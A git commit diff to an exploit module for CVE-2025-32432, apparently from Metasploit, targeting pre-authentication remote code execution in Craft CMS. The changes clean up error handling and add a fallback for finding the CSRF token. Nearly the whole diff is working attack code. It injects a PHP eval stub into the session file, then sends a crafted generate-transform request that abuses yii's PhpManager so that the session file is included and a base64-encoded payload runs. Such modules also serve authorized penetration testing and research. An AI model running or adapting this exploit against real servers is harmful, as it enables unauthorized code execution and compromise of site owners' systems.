Improve error handling, and search csrf_token in root uri

Chocapikk · Chocapikk · commit a0e9758c7fdf · 2025-04-27T08:01:17.000+02:00
diff --git a/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb b/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
@@ -71,110 +71,129 @@ def initialize(info = {})
   end
 
   def check
-    csrf = fetch_cookies_and_csrf
-    return CheckCode::Unknown('Could not retrieve cookies & CSRF') unless csrf
+    csrf_token = fetch_cookies_and_csrf
+    return CheckCode::Unknown('Could not retrieve cookies & CSRF') if csrf_token.nil?
 
-    vprint_status("Using CSRF token: #{csrf}")
+    vprint_status "Using CSRF token: #{csrf_token}"
 
-    res = send_transform(csrf, datastore['ASSET_ID'], 'phpinfo')
-    return CheckCode::Unknown('No response from generate-transform') unless res
+    response = send_transform(csrf_token, datastore['ASSET_ID'], 'phpinfo')
+    return CheckCode::Unknown('No response from generate-transform') if response.nil?
 
-    if res.body.include?('If you did not receive a copy of the PHP license')
-      return CheckCode::Vulnerable('License text detected')
+    if response.body.include?('If you did not receive a copy of the PHP license')
+      CheckCode::Vulnerable('License text detected')
+    else
+      CheckCode::Safe('License text not detected')
     end
-
-    CheckCode::Safe('License text not detected')
   end
 
   def php_exec_cmd(encoded_payload)
-    vars = Rex::RandomIdentifier::Generator.new
-    dis = '$' + vars[:dis]
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-    shell = <<-END_OF_PHP_CODE
-            #{php_preamble(disabled_varname: dis)}
-            $c = base64_decode("#{encoded_clean_payload}");
-            #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-    return shell
+    generator = Rex::RandomIdentifier::Generator.new
+    disabled_var = "$#{generator[:dis]}"
+    payload_b64 = Rex::Text.encode_base64(encoded_payload)
+
+    <<~PHP
+      #{php_preamble(disabled_varname: disabled_var)}
+      $c = base64_decode("#{payload_b64}");
+      #{php_system_block(cmd_varname: '$c', disabled_varname: disabled_var)}
+    PHP
   end
 
   def exploit
-    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
-    final_payload = framework.encoders.create('php/base64').encode(phped_payload)
-
-    random_param_name = Rex::Text.rand_text_alphanumeric(5..12)
-
-    first_payload = "<?=eval(\$_GET[\"#{random_param_name}\"]);die()?>"
-
-    print_status('Making initial request to push payload and get a CSRF token..')
-
-    craft_session_id, csrf = fetch_cookies_and_csrf(first_payload)
-    vprint_status("CraftSessionId: #{craft_session_id}")
-    vprint_status("Found CSRF token: #{csrf}")
+    payload_code = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
+    encoded_payload = framework.encoders
+                               .create('php/base64')
+                               .encode(payload_code)
+
+    random_param = Rex::Text.rand_text_alphanumeric(5..12)
+    initial_payload = "<?=eval($_GET['#{random_param}']);die()?>"
+
+    print_status 'Making initial request to push payload and get a CSRF token'
+    session_id, csrf_token = fetch_cookies_and_csrf(initial_payload)
+    unless csrf_token
+      fail_with(Failure::Unknown, 'Could not retrieve session ID and CSRF token')
+    end
 
-    print_status('Triggering code via assets/generate-transform')
+    vprint_status "Session ID: #{session_id}"
+    vprint_status "CSRF token: #{csrf_token}"
 
-    json_data = {
-      'assetId' => datastore['ASSET_ID'],
-      'handle' => {
-        'width' => Rex::Text.rand_text_numeric(1..5),
-        'height' => Rex::Text.rand_text_numeric(1..5),
+    print_status 'Triggering code via assets/generate-transform'
+    request_payload = {
+      assetId: datastore['ASSET_ID'],
+      handle: {
+        width: Rex::Text.rand_text_numeric(1..5),
+        height: Rex::Text.rand_text_numeric(1..5),
         'as hack' => {
-          'class' => 'craft\\behaviors\\FieldLayoutBehavior',
-          '__class' => 'yii\\rbac\\PhpManager',
+          class: 'craft\\behaviors\\FieldLayoutBehavior',
+          __class: 'yii\\rbac\\PhpManager',
           '__construct()' => [
-            {
-              'itemFile' => "/var/lib/php/sessions/sess_#{craft_session_id}"
-            }
+            { itemFile: "/var/lib/php/sessions/sess_#{session_id}" }
           ]
         }
       }
     }.to_json
 
-    send_request_cgi({
+    send_request_cgi!(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'index.php'),
-      'vars_get' => { 'p' => 'actions/assets/generate-transform', random_param_name => final_payload },
-      'headers' => { 'X-CSRF-Token' => csrf },
+      'vars_get' => { 'p' => 'actions/assets/generate-transform', random_param => encoded_payload },
+      'headers' => { 'X-CSRF-Token' => csrf_token },
       'ctype' => 'application/json',
-      'data' => json_data,
+      'data' => request_payload,
       'keep_cookies' => true
-    })
+    )
   end
 
-  def fetch_cookies_and_csrf(payload_param = nil)
-    vars_get = { 'p' => 'admin/dashboard' }
-    random_param_name = Rex::Text.rand_text_alphanumeric(5..12)
-    vars_get[random_param_name] = payload_param if payload_param
+  def extract_csrf_token(res)
+    get_token = lambda do |r|
+      next unless r&.code == 200
 
-    query_string = vars_get.map { |key, value| "#{key}=#{value}" }.join('&')
-    cookie_jar.clear
-    opts = {
-      'method' => 'GET',
-      'uri_encode_mode' => 'none',
-      'uri' => normalize_uri(target_uri.path, 'index.php') + '?' + query_string
-    }
+      r.get_html_document.at("//input[@name='CRAFT_CSRF_TOKEN']/@value")&.text
+    end
+
+    token = get_token.call(res)
 
-    res1 = send_request_cgi(opts)
+    if token.nil? || token.empty?
+      vprint_status 'CSRF not found, falling back to root'
+      fb_res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'keep_cookies' => true
+      )
+      token = get_token.call(fb_res)
+    end
+
+    token unless token.nil? || token.empty?
+  end
 
-    cookies = res1.get_cookies
-    craft_session_id = cookies.split(';').find { |cookie| cookie.strip.start_with?('CraftSessionId=') }&.split('=')&.last&.strip
-    return nil unless craft_session_id
+  def fetch_cookies_and_csrf(payload_param = nil)
+    rand_param = Rex::Text.rand_text_alphanumeric(5..12)
+    params = { 'p' => 'admin/dashboard', rand_param => payload_param }.compact
 
-    opts2 = {
+    cookie_jar.clear
+    res = send_request_cgi(
       'method' => 'GET',
-      'uri' => res1.headers['Location'],
-      'keep_cookies' => true
-    }
+      'uri_encode_mode' => 'none',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_get' => params
+    )
+    return nil unless res
 
-    res2 = send_request_cgi(opts2)
+    raw_cookies = res.get_cookies.to_s
+    session_id = raw_cookies.scan(/CraftSessionId=([^;]+)/).flatten.first
+    return nil if session_id.nil? || session_id.empty?
 
-    return nil unless res2&.code == 200
+    if res.code == 302 && res.headers['Location']
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => res.headers['Location'],
+        'keep_cookies' => true
+      )
+    end
 
-    csrf = res2.get_html_document.at('//input[@name="CRAFT_CSRF_TOKEN"]/@value')&.text
-    return nil unless csrf
+    token = extract_csrf_token(res)
+    return nil unless token
 
-    payload_param ? [craft_session_id, csrf] : csrf
+    payload_param ? [session_id, token] : token
   end
 
   def send_transform(csrf, asset_id, php_string)
